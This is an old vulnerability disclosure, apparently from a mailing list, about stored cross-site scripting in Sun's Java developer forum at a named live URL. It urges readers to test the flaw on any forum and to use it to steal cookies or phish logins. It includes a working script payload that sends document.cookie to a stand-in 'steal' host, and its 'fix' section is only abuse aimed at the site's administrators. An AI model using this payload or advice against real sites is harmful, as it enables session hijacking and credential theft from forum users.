sunForumXSS.txt

`Sun, in their amazing patheticness, have again allowed direct HTML   
to be written into their forum system.  
  
URL: http://forum.java.sun.com/forum.jspa?forumID=553  
  
It works on only select forums, but due to severe incompetence from   
the administrators of the site, this issue will occur quit often.   
It is worth your while to test out any forum you like, you may just   
see it working.  
  
  
EXPLOIT (hah):  
==============  
start a new thread or post a reply and include any HTML you like,   
preferrably to steal a cookie or trick users into logging in again   
but submit to your server; your imagination is the only restriction.  
  
  
EXAMPLE:  
==============  
Message:  
Hello.   
<img id="xxa" />  
<script>window.attachEvent("onload", foo);  
function foo() {  
xxa.src = "http://www.example.com/steal/?" + document.cookie;  
}  
</script>  
  
  
FIX:  
==============  
Sun needs to accept that their administration of the site is   
absolutely terrible and do something about it. The Jive software   
that runs the forum is completely fine, it is suns mismanagement   
that causes these issues. Jive should not be subject to the very   
bad image the forum software gets from it's use on Sun's site.  
  
Thanks.  
  
  
  
Concerned about your privacy? Instantly send FREE secure email, no account required  
http://www.hushmail.com/send?l=480  
  
Get the best prices on SSL certificates from Hushmail  
https://www.hushssl.com?l=485  
  
`